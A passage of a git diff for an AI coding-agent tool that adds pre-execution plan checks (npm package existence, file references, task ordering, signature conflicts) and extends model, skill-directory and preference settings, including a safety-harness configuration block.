+  // require('pkg') or import from 'pkg' in code blocks
+  const importPattern = /(?:require\s*\(\s*['"]|from\s+['"])([a-zA-Z0-9@/_-]+)['"\)]/g;
+  let importMatch: RegExpExecArray | null;
+  while ((importMatch = importPattern.exec(description)) !== null) {
+    // Skip relative imports and node builtins
+    const pkg = importMatch[1];
+    if (!pkg.startsWith(".") && !pkg.startsWith("node:")) {
+      packages.add(normalizePackageName(pkg));
+    }
+  }
+
+  return Array.from(packages);
+}
+
+/**
+ * Normalize package name to registry-checkable form.
+ * Handles scoped packages (@org/pkg) and subpaths (pkg/subpath → pkg).
+ */
+function normalizePackageName(raw: string): string {
+  // Scoped package: @org/pkg or @org/pkg/subpath
+  if (raw.startsWith("@")) {
+    const parts = raw.split("/");
+    return parts.length >= 2 ? `${parts[0]}/${parts[1]}` : raw;
+  }
+  // Regular package: pkg or pkg/subpath
+  return raw.split("/")[0];
+}
+
+/**
+ * Check if a package exists on npm registry.
+ * Returns null on success, error message on failure.
+ * Times out after timeoutMs (default 5000ms).
+ */
+async function checkPackageOnNpm(
+  packageName: string,
+  timeoutMs = 5000
+): Promise<{ exists: boolean; error?: string }> {
+  return new Promise((resolve) => {
+    const child = spawn("npm", ["view", packageName, "name"], {
+      stdio: ["ignore", "pipe", "pipe"],
+      timeout: timeoutMs,
+    });
+
+    let stdout = "";
+    let stderr = "";
+
+    child.stdout.on("data", (data: Buffer) => {
+      stdout += data.toString();
+    });
+    child.stderr.on("data", (data: Buffer) => {
+      stderr += data.toString();
+    });
+
+    const timer = setTimeout(() => {
+      child.kill("SIGTERM");
+      resolve({ exists: false, error: `Timeout after ${timeoutMs}ms` });
+    }, timeoutMs);
+
+    child.on("close", (code) => {
+      clearTimeout(timer);
+      if (code === 0 && stdout.trim()) {
+        resolve({ exists: true });
+      } else if (stderr.includes("404") || stderr.includes("not found")) {
+        resolve({ exists: false, error: `Package not found: ${packageName}` });
+      } else if (code !== 0) {
+        // Network error or other issue — warn, don't fail
+        resolve({ exists: true, error: `npm view failed (code ${code}): ${stderr.slice(0, 100)}` });
+      } else {
+        resolve({ exists: true });
+      }
+    });
+
+    child.on("error", (err) => {
+      clearTimeout(timer);
+      resolve({ exists: true, error: `npm spawn error: ${err.message}` });
+    });
+  });
+}
+
+/**
+ * Check all package references in tasks for existence on npm.
+ * Runs checks in parallel with a 5s timeout per package.
+ * Network failures warn but don't fail (R012 conservative design).
+ */
+export async function checkPackageExistence(
+  tasks: TaskRow[],
+  _basePath: string
+): Promise<PreExecutionCheckJSON[]> {
+  const results: PreExecutionCheckJSON[] = [];
+  const packagesToCheck = new Set<string>();
+
+  // Collect all package references from task descriptions
+  for (const task of tasks) {
+    const packages = extractPackageReferences(task.description);
+    for (const pkg of packages) {
+      packagesToCheck.add(pkg);
+    }
+  }
+
+  if (packagesToCheck.size === 0) {
+    return results;
+  }
+
+  // Check packages in parallel
+  const checkPromises = Array.from(packagesToCheck).map(async (pkg) => {
+    const result = await checkPackageOnNpm(pkg);
+    return { pkg, result };
+  });
+
+  const checkResults = await Promise.all(checkPromises);
+
+  for (const { pkg, result } of checkResults) {
+    if (!result.exists && !result.error?.includes("Timeout") && !result.error?.includes("spawn error")) {
+      // Package genuinely doesn't exist — blocking failure
+      results.push({
+        category: "package",
+        target: pkg,
+        passed: false,
+        message: result.error || `Package '${pkg}' not found on npm`,
+        blocking: true,
+      });
+    } else if (result.error) {
+      // Network issue or timeout — warn but don't block
+      results.push({
+        category: "package",
+        target: pkg,
+        passed: true,
+        message: `Warning: ${result.error}`,
+        blocking: false,
+      });
+    }
+    // Silent success for existing packages — no need to report
+  }
+
+  return results;
+}
+
+// ─── File Path Consistency Check ─────────────────────────────────────────────
+
+/**
+ * Normalize a file path for consistent comparison.
+ * - Strips leading ./
+ * - Normalizes path separators to forward slashes
+ * - Resolves redundant segments (e.g., foo/../bar → bar)
+ * 
+ * This ensures that "./src/a.ts", "src/a.ts", and "src//a.ts" all compare equal.
+ */
+export function normalizeFilePath(filePath: string): string {
+  if (!filePath) return filePath;
+
+  let normalized = extractPathFromAnnotation(filePath);
+
+  // Normalize path separators to forward slashes
+  normalized = normalized.replace(/\\/g, "/");
+  
+  // Remove leading ./
+  while (normalized.startsWith("./")) {
+    normalized = normalized.slice(2);
+  }
+  
+  // Remove duplicate slashes
+  normalized = normalized.replace(/\/+/g, "/");
+  
+  // Remove trailing slash unless it's the root
+  if (normalized.length > 1 && normalized.endsWith("/")) {
+    normalized = normalized.slice(0, -1);
+  }
+  
+  return normalized;
+}
+
+function extractPathFromAnnotation(raw: string): string {
+  const trimmed = raw.trim();
+  if (!trimmed) return trimmed;
+
+  const backtickMatch = trimmed.match(/^`([^`]+)`(?:\s+[—–-]\s+.*)?$/);
+  if (backtickMatch) {
+    return backtickMatch[1].trim();
+  }
+
+  const annotatedMatch = trimmed.match(/^(.+?)\s+[—–-]\s+.+$/);
+  if (annotatedMatch) {
+    return annotatedMatch[1].trim();
+  }
+
+  // Fall back to the original behavior for already-plain paths.
+  return trimmed.replace(/`/g, "");
+}
+
+/**
+ * Build a set of files that will be created by tasks up to (but not including) taskIndex.
+ * All paths are normalized for consistent comparison.
+ */
+function getExpectedOutputsUpTo(tasks: TaskRow[], taskIndex: number): Set<string> {
+  const outputs = new Set<string>();
+  for (let i = 0; i < taskIndex; i++) {
+    for (const file of tasks[i].expected_output) {
+      outputs.add(normalizeFilePath(file));
+    }
+  }
+  return outputs;
+}
+
+/**
+ * Check that all files referenced in task.inputs either:
+ *   1. Exist on disk, OR
+ *   2. Are in a prior task's expected_output
+ *
+ * task.files ("files likely touched") is excluded — it intentionally includes
+ * files the task will create, so they don't need to pre-exist (#3626).
+ *
+ * All paths are normalized before comparison to ensure ./src/a.ts matches src/a.ts.
+ */
+export function checkFilePathConsistency(
+  tasks: TaskRow[],
+  basePath: string
+): PreExecutionCheckJSON[] {
+  const results: PreExecutionCheckJSON[] = [];
+
+  for (let i = 0; i < tasks.length; i++) {
+    const task = tasks[i];
+    const priorOutputs = getExpectedOutputsUpTo(tasks, i);
+    const filesToCheck = [...task.inputs];
+
+    for (const file of filesToCheck) {
+      // Skip empty strings
+      if (!file.trim()) continue;
+
+      // Normalize path for consistent comparison
+      const normalizedFile = normalizeFilePath(file);
+
+      // Check if file exists on disk
+      const absolutePath = resolve(basePath, normalizedFile);
+      const existsOnDisk = existsSync(absolutePath);
+
+      // Check if file is in prior expected outputs (priorOutputs already normalized)
+      const inPriorOutputs = priorOutputs.has(normalizedFile);
+
+      if (!existsOnDisk && !inPriorOutputs) {
+        results.push({
+          category: "file",
+          target: file,
+          passed: false,
+          message: `Task ${task.id} references '${file}' which doesn't exist and isn't created by prior tasks`,
+          blocking: true,
+        });
+      }
+    }
+  }
+
+  return results;
+}
+
+// ─── Task Ordering Check ─────────────────────────────────────────────────────
+
+/**
+ * Detect impossible task ordering: task N reads a file that task N+M creates.
+ * This is a fatal error — the plan has an impossible dependency.
+ * 
+ * All paths are normalized before comparison to ensure ./src/a.ts matches src/a.ts.
+ */
+export function checkTaskOrdering(
+  tasks: TaskRow[],
+  _basePath: string
+): PreExecutionCheckJSON[] {
+  const results: PreExecutionCheckJSON[] = [];
+
+  // Build map: normalized file → task index that creates it
+  const fileCreators = new Map<string, { taskId: string; index: number; originalPath: string }>();
+  for (let i = 0; i < tasks.length; i++) {
+    const task = tasks[i];
+    for (const file of task.expected_output) {
+      const normalizedFile = normalizeFilePath(file);
+      if (!fileCreators.has(normalizedFile)) {
+        fileCreators.set(normalizedFile, { taskId: task.id, index: i, originalPath: file });
+      }
+    }
+  }
+
+  // Check each task's inputs against file creators.
+  // Only check task.inputs — task.files ("files likely touched") intentionally
+  // includes files the task will create, so they don't indicate read-before-create (#3677).
+  for (let i = 0; i < tasks.length; i++) {
+    const task = tasks[i];
+    const filesToCheck = [...task.inputs];
+
+    for (const file of filesToCheck) {
+      const normalizedFile = normalizeFilePath(file);
+      const creator = fileCreators.get(normalizedFile);
+      if (creator && creator.index > i) {
+        // Task reads file that is created later — impossible ordering
+        results.push({
+          category: "file",
+          target: file,
+          passed: false,
+          message: `Task ${task.id} reads '${file}' but it's created by task ${creator.taskId} (sequence violation)`,
+          blocking: true,
+        });
+      }
+    }
+  }
+
+  return results;
+}
+
+// ─── Interface Contract Check ────────────────────────────────────────────────
+
+interface FunctionSignature {
+  name: string;
+  params: string;
+  returnType: string;
+  taskId: string;
+  raw: string;
+}
+
+/**
+ * Extract function signatures from code blocks in task description.
+ * Uses heuristic regex — not an AST parser.
+ */
+function extractFunctionSignatures(description: string, taskId: string): FunctionSignature[] {
+  const signatures: FunctionSignature[] = [];
+
+  // Match code blocks (```...```)
+  const codeBlockPattern = /```(?:typescript|ts|javascript|js)?\n([\s\S]*?)```/g;
+  let blockMatch: RegExpExecArray | null;
+
+  while ((blockMatch = codeBlockPattern.exec(description)) !== null) {
+    const codeBlock = blockMatch[1];
+
+    // Match function declarations and exports
+    // Patterns:
+    //   function name(params): ReturnType
+    //   export function name(params): ReturnType
+    //   export async function name(params): Promise<ReturnType>
+    //   const name = (params): ReturnType =>
+    //   export const name = (params): ReturnType =>
+    const funcPattern = /(?:export\s+)?(?:async\s+)?(?:function\s+|const\s+)(\w+)(?:\s*=\s*)?\s*\(([^)]*)\)(?:\s*:\s*([^{=>\n]+))?/g;
+    let funcMatch: RegExpExecArray | null;
+
+    while ((funcMatch = funcPattern.exec(codeBlock)) !== null) {
+      const [raw, name, params, returnType] = funcMatch;
+      signatures.push({
+        name,
+        params: normalizeParams(params),
+        returnType: normalizeType(returnType || "void"),
+        taskId,
+        raw: raw.trim(),
+      });
+    }
+
+    // Match interface method signatures
+    // Pattern: methodName(params): ReturnType;
+    const methodPattern = /^\s*(\w+)\s*\(([^)]*)\)\s*:\s*([^;]+);/gm;
+    let methodMatch: RegExpExecArray | null;
+
+    while ((methodMatch = methodPattern.exec(codeBlock)) !== null) {
+      const [raw, name, params, returnType] = methodMatch;
+      signatures.push({
+        name,
+        params: normalizeParams(params),
+        returnType: normalizeType(returnType),
+        taskId,
+        raw: raw.trim(),
+      });
+    }
+  }
+
+  return signatures;
+}
+
+/**
+ * Normalize parameter list for comparison.
+ * Removes whitespace, comments, and default values.
+ */
+function normalizeParams(params: string): string {
+  return params
+    .replace(/\/\*[\s\S]*?\*\//g, "") // Remove block comments
+    .replace(/\/\/[^\n]*/g, "")       // Remove line comments
+    .replace(/\s*=\s*[^,)]+/g, "")    // Remove default values
+    .replace(/\s+/g, " ")             // Normalize whitespace
+    .trim();
+}
+
+/**
+ * Normalize type for comparison.
+ */
+function normalizeType(type: string): string {
+  return type
+    .replace(/\s+/g, " ")
+    .trim();
+}
+
+/**
+ * Check for contradictory function signatures across tasks.
+ * Same function name with different signatures is a warning (not blocking).
+ */
+export function checkInterfaceContracts(
+  tasks: TaskRow[],
+  _basePath: string
+): PreExecutionCheckJSON[] {
+  const results: PreExecutionCheckJSON[] = [];
+
+  // Collect all signatures
+  const allSignatures: FunctionSignature[] = [];
+  for (const task of tasks) {
+    const sigs = extractFunctionSignatures(task.description, task.id);
+    allSignatures.push(...sigs);
+  }
+
+  // Group by function name
+  const byName = new Map<string, FunctionSignature[]>();
+  for (const sig of allSignatures) {
+    const existing = byName.get(sig.name) || [];
+    existing.push(sig);
+    byName.set(sig.name, existing);
+  }
+
+  // Check for contradictions
+  for (const [name, sigs] of byName) {
+    if (sigs.length < 2) continue;
+
+    // Compare signatures
+    const first = sigs[0];
+    for (let i = 1; i < sigs.length; i++) {
+      const current = sigs[i];
+
+      // Check parameter mismatch
+      if (first.params !== current.params) {
+        results.push({
+          category: "schema",
+          target: name,
+          passed: true, // Warning only, not blocking
+          message: `Function '${name}' has different parameters: '${first.params}' (${first.taskId}) vs '${current.params}' (${current.taskId})`,
+          blocking: false,
+        });
+      }
+
+      // Check return type mismatch
+      if (first.returnType !== current.returnType) {
+        results.push({
+          category: "schema",
+          target: name,
+          passed: true, // Warning only, not blocking
+          message: `Function '${name}' has different return types: '${first.returnType}' (${first.taskId}) vs '${current.returnType}' (${current.taskId})`,
+          blocking: false,
+        });
+      }
+    }
+  }
+
+  return results;
+}
+
+// ─── Main Entry Point ────────────────────────────────────────────────────────
+
+/**
+ * Run all pre-execution checks against a slice's task plan.
+ *
+ * @param tasks - Array of TaskRow from the slice
+ * @param basePath - Base path for resolving file references
+ * @returns PreExecutionResult with status, checks, and duration
+ */
+export async function runPreExecutionChecks(
+  tasks: TaskRow[],
+  basePath: string
+): Promise<PreExecutionResult> {
+  const startTime = Date.now();
+  const allChecks: PreExecutionCheckJSON[] = [];
+
+  // Run sync checks first
+  const fileChecks = checkFilePathConsistency(tasks, basePath);
+  const orderingChecks = checkTaskOrdering(tasks, basePath);
+  const contractChecks = checkInterfaceContracts(tasks, basePath);
+
+  allChecks.push(...fileChecks, ...orderingChecks, ...contractChecks);
+
+  // Run async package checks
+  const packageChecks = await checkPackageExistence(tasks, basePath);
+  allChecks.push(...packageChecks);
+
+  const durationMs = Date.now() - startTime;
+
+  // Determine overall status
+  const hasBlockingFailure = allChecks.some((c) => !c.passed && c.blocking);
+  const hasNonBlockingFailure = allChecks.some((c) => !c.passed && !c.blocking);
+  // Interface contract checks pass but still report warnings via message
+  const hasInterfaceWarning = allChecks.some(
+    (c) => c.category === "schema" && c.message && !c.message.startsWith("Warning:")
+  );
+  const hasNetworkWarning = allChecks.some(
+    (c) => c.passed && c.message?.startsWith("Warning:")
+  );
+
+  let status: "pass" | "warn" | "fail";
+  if (hasBlockingFailure) {
+    status = "fail";
+  } else if (hasNonBlockingFailure || hasInterfaceWarning || hasNetworkWarning) {
+    status = "warn";
+  } else {
+    status = "pass";
+  }
+
+  return {
+    status,
+    checks: allChecks,
+    durationMs,
+  };
+}
diff --git a/src/resources/extensions/gsd/preferences-models.ts b/src/resources/extensions/gsd/preferences-models.ts
index 303c43470..2e4171687 100644
--- a/src/resources/extensions/gsd/preferences-models.ts
+++ b/src/resources/extensions/gsd/preferences-models.ts
@@ -56,16 +56,29 @@ export function resolveModelWithFallbacksForUnit(unitType: string): ResolvedMode
     case "replan-slice":
       phaseConfig = m.planning;
       break;
+    case "discuss-milestone":
+    case "discuss-slice":
+      phaseConfig = m.discuss ?? m.planning;
+      break;
     case "execute-task":
+    case "reactive-execute":
       phaseConfig = m.execution;
       break;
     case "execute-task-simple":
       phaseConfig = m.execution_simple ?? m.execution;
       break;
     case "complete-slice":
+    case "complete-milestone":
+    case "worktree-merge":
     case "run-uat":
       phaseConfig = m.completion;
       break;
+    case "reassess-roadmap":
+    case "rewrite-docs":
+    case "gate-evaluate":
+    case "validate-milestone":
+      phaseConfig = m.validation ?? m.planning;
+      break;
     default:
       // Subagent unit types (e.g., "subagent", "subagent/scout")
       if (unitType === "subagent" || unitType.startsWith("subagent/")) {
@@ -94,6 +107,84 @@ export function resolveModelWithFallbacksForUnit(unitType: string): ResolvedMode
   };
 }
 
+/**
+ * Resolve the default session model from GSD preferences.
+ *
+ * Used at auto-mode bootstrap to override the session model that was
+ * determined by settings.json (defaultProvider/defaultModel).  When
+ * PREFERENCES.md (or project preferences) configures an `execution` model
+ * we treat that as the session default.  Falls back through execution →
+ * planning → first configured model.
+ *
+ * Accepts an optional `sessionProvider` for bare model IDs that don't
+ * include an explicit provider prefix (e.g. `gpt-5.4` instead of
+ * `openai-codex/gpt-5.4`).  When a bare ID is found and sessionProvider
+ * is available, the session provider is used.  Without sessionProvider,
+ * bare IDs are still returned with provider set to the bare ID itself
+ * so downstream resolution (resolveModelId) can match it.
+ *
+ * Returns `{ provider, id }` or `undefined` if no model preference is
+ * configured.
+ */
+export function resolveDefaultSessionModel(
+  sessionProvider?: string,
+): { provider: string; id: string } | undefined {
+  const prefs = loadEffectiveGSDPreferences();
+  if (!prefs?.preferences.models) return undefined;
+
+  const m = prefs.preferences.models as GSDModelConfigV2;
+
+  // Priority: execution → planning → first configured value
+  const candidates: Array<string | GSDPhaseModelConfig | undefined> = [
+    m.execution,
+    m.planning,
+    m.research,
+    m.discuss,
+    m.completion,
+    m.validation,
+    m.subagent,
+  ];
+
+  for (const cfg of candidates) {
+    if (!cfg) continue;
+
+    // Normalize to provider + id from the various config shapes
+    let provider: string | undefined;
+    let id: string;
+
+    if (typeof cfg === "string") {
+      const slashIdx = cfg.indexOf("/");
+      if (slashIdx !== -1) {
+        provider = cfg.slice(0, slashIdx);
+        id = cfg.slice(slashIdx + 1);
+      } else {
+        // Bare model ID (e.g. "gpt-5.4") — use session provider as context
+        provider = sessionProvider;
+        id = cfg;
+      }
+    } else {
+      // Object config: { model, provider?, fallbacks? }
+      if (cfg.provider) {
+        provider = cfg.provider;
+      } else if (cfg.model.includes("/")) {
+        const slashIdx = cfg.model.indexOf("/");
+        provider = cfg.model.slice(0, slashIdx);
+        id = cfg.model.slice(slashIdx + 1);
+        return { provider, id };
+      } else {
+        provider = sessionProvider;
+      }
+      id = cfg.model;
+    }
+
+    if (provider && id) {
+      return { provider, id };
+    }
+  }
+
+  return undefined;
+}
+
 /**
  * Determines the next fallback model to try when the current model fails.
  * If the current model is not in the configured list, returns the primary model.
diff --git a/src/resources/extensions/gsd/preferences-skills.ts b/src/resources/extensions/gsd/preferences-skills.ts
index b449af8b4..d930ba0b4 100644
--- a/src/resources/extensions/gsd/preferences-skills.ts
+++ b/src/resources/extensions/gsd/preferences-skills.ts
@@ -8,7 +8,6 @@
 import { existsSync, readdirSync } from "node:fs";
 import { homedir } from "node:os";
 import { isAbsolute, join } from "node:path";
-import { getAgentDir } from "@gsd/pi-coding-agent";
 import { statSync } from "node:fs";
 
 import type {
@@ -25,13 +24,25 @@ export type { GSDSkillRule, SkillDiscoveryMode, SkillResolution, SkillResolution
 
 /**
  * Known skill directories, in priority order.
- * User skills (~/.gsd/agent/skills/) take precedence over project skills.
+ * Searches both the skills.sh ecosystem directory (~/.agents/skills/) and
+ * Claude Code's official directory (~/.claude/skills/). Project-level
+ * directories for both conventions are included as well.
+ * Legacy ~/.gsd/agent/skills/ is included as a fallback for pre-migration installs.
  */
 export function getSkillSearchDirs(cwd: string): Array<{ dir: string; method: SkillResolution["method"] }> {
-  return [
-    { dir: join(getAgentDir(), "skills"), method: "user-skill" },
-    { dir: join(cwd, ".pi", "agent", "skills"), method: "project-skill" },
+  const dirs: Array<{ dir: string; method: SkillResolution["method"] }> = [
+    { dir: join(homedir(), ".agents", "skills"), method: "user-skill" },
+    { dir: join(cwd, ".agents", "skills"), method: "project-skill" },
+    // Claude Code official skill directories
+    { dir: join(homedir(), ".claude", "skills"), method: "user-skill" },
+    { dir: join(cwd, ".claude", "skills"), method: "project-skill" },
   ];
+  // Legacy fallback — read skills from old GSD directory only if migration hasn't completed
+  const legacyDir = join(homedir(), ".gsd", "agent", "skills");
+  if (existsSync(legacyDir) && !existsSync(join(legacyDir, ".migrated-to-agents"))) {
+    dirs.push({ dir: legacyDir, method: "user-skill" });
+  }
+  return dirs;
 }
 
 /**
diff --git a/src/resources/extensions/gsd/preferences-types.ts b/src/resources/extensions/gsd/preferences-types.ts
index 36e6f83f5..58b847cc9 100644
--- a/src/resources/extensions/gsd/preferences-types.ts
+++ b/src/resources/extensions/gsd/preferences-types.ts
@@ -18,8 +18,16 @@ import type {
   ParallelConfig,
   ContextSelectionMode,
   ReactiveExecutionConfig,
+  GateEvaluationConfig,
 } from "./types.js";
 import type { DynamicRoutingConfig } from "./model-router.js";
+
+export interface ContextManagementConfig {
+  observation_masking?: boolean;          // default: true
+  observation_mask_turns?: number;        // default: 8, range: 1-50
+  compaction_threshold_percent?: number;  // default: 0.70, range: 0.5-0.95
+  tool_result_max_chars?: number;         // default: 800, range: 200-10000
+}
 import type { GitHubSyncConfig } from "../github-sync/types.js";
 
 // ─── Workflow Modes ──────────────────────────────────────────────────────────
@@ -32,9 +40,9 @@ export const MODE_DEFAULTS: Record<WorkflowMode, Partial<GSDPreferences>> = {
     git: {
       auto_push: true,
       push_branches: false,
-      pre_merge_check: false,
+      pre_merge_check: "auto",
       merge_strategy: "squash",
-      isolation: "worktree",
+      isolation: "none",
     },
     unique_milestone_ids: false,
   },
@@ -44,7 +52,7 @@ export const MODE_DEFAULTS: Record<WorkflowMode, Partial<GSDPreferences>> = {
       push_branches: true,
       pre_merge_check: true,
       merge_strategy: "squash",
-      isolation: "worktree",
+      isolation: "none",
     },
     unique_milestone_ids: true,
   },
@@ -87,15 +95,32 @@ export const KNOWN_PREFERENCE_KEYS = new Set<string>([
   "context_selection",
   "widget_mode",
   "reactive_execution",
+  "gate_evaluation",
   "github",
   "service_tier",
+  "forensics_dedup",
+  "show_token_cost",
+  "stale_commit_threshold_minutes",
+  "context_management",
+  "experimental",
+  "codebase",
+  "slice_parallel",
+  "safety_harness",
+  "enhanced_verification",
+  "enhanced_verification_pre",
+  "enhanced_verification_post",
+  "enhanced_verification_strict",
+  "discuss_preparation",
+  "discuss_web_research",
+  "discuss_depth",
 ]);
 
 /** Canonical list of all dispatch unit types. */
 export const KNOWN_UNIT_TYPES = [
   "research-milestone", "plan-milestone", "research-slice", "plan-slice",
-  "execute-task", "reactive-execute", "complete-slice", "replan-slice", "reassess-roadmap",
-  "run-uat", "complete-milestone",
+  "execute-task", "reactive-execute", "gate-evaluate", "complete-slice", "replan-slice", "reassess-roadmap",
+  "run-uat", "complete-milestone", "validate-milestone", "rewrite-docs",
+  "discuss-milestone", "discuss-slice", "worktree-merge",
 ] as const;
 export type UnitType = (typeof KNOWN_UNIT_TYPES)[number];
 
@@ -129,9 +154,11 @@ export interface GSDPhaseModelConfig {
 export interface GSDModelConfig {
   research?: string;
   planning?: string;
+  discuss?: string;
   execution?: string;
   execution_simple?: string;
   completion?: string;
+  validation?: string;
   subagent?: string;
 }
 
@@ -142,9 +169,11 @@ export interface GSDModelConfig {
 export interface GSDModelConfigV2 {
   research?: string | GSDPhaseModelConfig;
   planning?: string | GSDPhaseModelConfig;
+  discuss?: string | GSDPhaseModelConfig;
   execution?: string | GSDPhaseModelConfig;
   execution_simple?: string | GSDPhaseModelConfig;
   completion?: string | GSDPhaseModelConfig;
+  validation?: string | GSDPhaseModelConfig;
   subagent?: string | GSDPhaseModelConfig;
 }
 
@@ -178,6 +207,30 @@ export interface CmuxPreferences {
   browser?: boolean;
 }
 
+/**
+ * Opt-in experimental features. All features in this block are disabled by
+ * default and must be explicitly enabled. They may change or be removed without
+ * a deprecation cycle while in experimental status.
+ */
+export interface ExperimentalPreferences {
+  /**
+   * Enable RTK (Real-Time Kompression) shell-command compression.
+   * RTK wraps shell commands to reduce token usage during command execution.
+   * Default: false (opt-in required).
+   */
+  rtk?: boolean;
+}
+
+/** Configuration for the codebase map generator (/gsd codebase). */
+export interface CodebaseMapPreferences {
+  /** Additional directory/file patterns to exclude (e.g. ["docs/", "fixtures/"]). Merged with built-in defaults. */
+  exclude_patterns?: string[];
+  /** Max files to include in the map. Default: 500. */
+  max_files?: number;
+  /** Files-per-directory threshold before collapsing to a summary line. Default: 20. */
+  collapse_threshold?: number;
+}
+
 export interface GSDPreferences {
   version?: number;
   mode?: WorkflowMode;
@@ -202,6 +255,7 @@ export interface GSDPreferences {
   post_unit_hooks?: PostUnitHookConfig[];
   pre_dispatch_hooks?: PreDispatchHookConfig[];
   dynamic_routing?: DynamicRoutingConfig;
+  context_management?: ContextManagementConfig;
   token_profile?: TokenProfile;
   phases?: PhaseSkipPreferences;
   auto_visualize?: boolean;
@@ -219,10 +273,90 @@ export interface GSDPreferences {
   widget_mode?: "full" | "small" | "min" | "off";
   /** Reactive (graph-derived parallel) task execution within slices. Disabled by default. */
   reactive_execution?: ReactiveExecutionConfig;
+  /** Parallel quality gate evaluation during slice planning. Disabled by default. */
+  gate_evaluation?: GateEvaluationConfig;
   /** GitHub sync configuration. Opt-in: syncs GSD events to GitHub Issues, Milestones, and PRs. */
   github?: GitHubSyncConfig;
   /** OpenAI service tier preference. "priority" = 2x cost, faster. "flex" = 0.5x cost, slower. Only affects gpt-5.4 models. */
   service_tier?: "priority" | "flex";
+  /** Opt-in: search existing issues and PRs before filing from /gsd forensics. Uses additional AI tokens. */
+  forensics_dedup?: boolean;
+  /** Opt-in: show per-prompt and cumulative session token cost in the footer. Default: false. */
+  show_token_cost?: boolean;
+  /**
+   * Minutes without a commit before flagging uncommitted changes as stale.
+   * When the threshold is exceeded and the working tree is dirty, doctor will
+   * auto-commit a safety snapshot tagged with `[gsd safety]`. Default: 30.
+   * Set to 0 to disable.
+   */
+  stale_commit_threshold_minutes?: number;
+  /**
+   * Opt-in experimental features. All features here are disabled by default.
+   * See the preferences reference for details on each feature.
+   */
+  experimental?: ExperimentalPreferences;
+  /** Configuration for the codebase map generator (/gsd codebase). */
+  codebase?: CodebaseMapPreferences;
+  /** Slice-level parallelism within a milestone. Disabled by default. */
+  slice_parallel?: { enabled?: boolean; max_workers?: number };
+  /** LLM safety harness configuration. Monitors, validates, and constrains LLM behavior during auto-mode. Enabled by default with warn-and-continue policy. */
+  safety_harness?: {
+    enabled?: boolean;
+    evidence_collection?: boolean;
+    file_change_validation?: boolean;
+    evidence_cross_reference?: boolean;
+    destructive_command_warnings?: boolean;
+    content_validation?: boolean;
+    checkpoints?: boolean;
+    auto_rollback?: boolean;
+    timeout_scale_cap?: number;
+  };
+
+
+  // ─── Enhanced Verification ──────────────────────────────────────────────────
+  /**
+   * Enable enhanced verification (both pre-execution and post-execution checks).
+   * Default: true (opt-out, not opt-in). Set false to disable all enhanced verification.
+   */
+  enhanced_verification?: boolean;
+  /**
+   * Enable pre-execution checks (package existence, file references, etc.).
+   * Only applies when enhanced_verification is true.
+   * Default: true.
+   */
+  enhanced_verification_pre?: boolean;
+  /**
+   * Enable post-execution checks (runtime error detection, audit warnings, etc.).
+   * Only applies when enhanced_verification is true.
+   * Default: true.
+   */
+  enhanced_verification_post?: boolean;
+  /**
+   * Strict mode: treat any pre-execution check failure as blocking.
+   * Default: false (warnings only for non-critical failures).
+   */
+  enhanced_verification_strict?: boolean;
+  /**
+   * Enable the preparation phase before discussion sessions.
+   * Preparation analyzes the codebase, reviews prior context, and optionally researches the ecosystem.
+   * Default: true.
+   */
+  discuss_preparation?: boolean;
+  /**
+   * Enable web research during preparation phase.
+   * When enabled, searches for best practices and known issues for the detected tech stack.
+   * Requires a search API key (TAVILY_API_KEY or BRAVE_API_KEY).
+   * Default: true.
+   */
+  discuss_web_research?: boolean;
+  /**
+   * Depth of preparation analysis.
+   * - "quick": Minimal analysis, fastest (~10s)
+   * - "standard": Balanced analysis (~30s)
+   * - "thorough": Deep analysis with more file sampling (~60s)
+   * Default: "standard".
+   */
+  discuss_depth?: "quick" | "standard" | "thorough";
 }
 
 export interface LoadedGSDPreferences {
diff --git a/src/resources/extensions/gsd/preferences-validation.ts b/src/resources/extensions/gsd/preferences-validation.ts
index d19468a68..e4ac3d3d6 100644
--- a/src/resources/extensions/gsd/preferences-validation.ts
+++ b/src/resources/extensions/gsd/preferences-validation.ts
@@ -428,6 +428,10 @@ export function validatePreferences(preferences: GSDPreferences): {
         if (typeof dr.hooks === "boolean") validDr.hooks = dr.hooks;
         else errors.push("dynamic_routing.hooks must be a boolean");
       }
+      if (dr.capability_routing !== undefined) {
+        if (typeof dr.capability_routing === "boolean") validDr.capability_routing = dr.capability_routing;
+        else errors.push("dynamic_routing.capability_routing must be a boolean");
+      }
       if (dr.tier_models !== undefined) {
         if (typeof dr.tier_models === "object" && dr.tier_models !== null) {
           const tm = dr.tier_models as Record<string, unknown>;
@@ -452,6 +456,40 @@ export function validatePreferences(preferences: GSDPreferences): {
     }
   }
 
+  // ─── Context Management ──────────────────────────────────────────────
+  if (preferences.context_management !== undefined) {
+    if (typeof preferences.context_management === "object" && preferences.context_management !== null) {
+      const cm = preferences.context_management as unknown as Record<string, unknown>;
+      const validCm: Record<string, unknown> = {};
+
+      if (cm.observation_masking !== undefined) {
+        if (typeof cm.observation_masking === "boolean") validCm.observation_masking = cm.observation_masking;
+        else errors.push("context_management.observation_masking must be a boolean");
+      }
+      if (cm.observation_mask_turns !== undefined) {
+        const turns = cm.observation_mask_turns;
+        if (typeof turns === "number" && turns >= 1 && turns <= 50) validCm.observation_mask_turns = turns;
+        else errors.push("context_management.observation_mask_turns must be a number between 1 and 50");
+      }
+      if (cm.compaction_threshold_percent !== undefined) {
+        const pct = cm.compaction_threshold_percent;
+        if (typeof pct === "number" && pct >= 0.5 && pct <= 0.95) validCm.compaction_threshold_percent = pct;
+        else errors.push("context_management.compaction_threshold_percent must be a number between 0.5 and 0.95");
+      }
+      if (cm.tool_result_max_chars !== undefined) {
+        const chars = cm.tool_result_max_chars;
+        if (typeof chars === "number" && chars >= 200 && chars <= 10000) validCm.tool_result_max_chars = chars;
+        else errors.push("context_management.tool_result_max_chars must be a number between 200 and 10000");
+      }
+
+      if (Object.keys(validCm).length > 0) {
+        validated.context_management = validCm as any;
+      }
+    } else {
+      errors.push("context_management must be an object");
+    }
+  }
+
   // ─── Parallel Config ────────────────────────────────────────────────────
   if (preferences.parallel && typeof preferences.parallel === "object") {
     const p = preferences.parallel as unknown as Record<string, unknown>;
@@ -492,6 +530,14 @@ export function validatePreferences(preferences: GSDPreferences): {
       }
     }
 
+    if (p.worker_model !== undefined) {
+      if (typeof p.worker_model === "string" && p.worker_model.length > 0) {
+        parallel.worker_model = p.worker_model;
+      } else {
+        errors.push("parallel.worker_model must be a non-empty string");
+      }
+    }
+
     if (Object.keys(parallel).length > 0) {
       validated.parallel = parallel as unknown as import("./types.js").ParallelConfig;
     }
@@ -523,7 +569,15 @@ export function validatePreferences(preferences: GSDPreferences): {
         }
       }
 
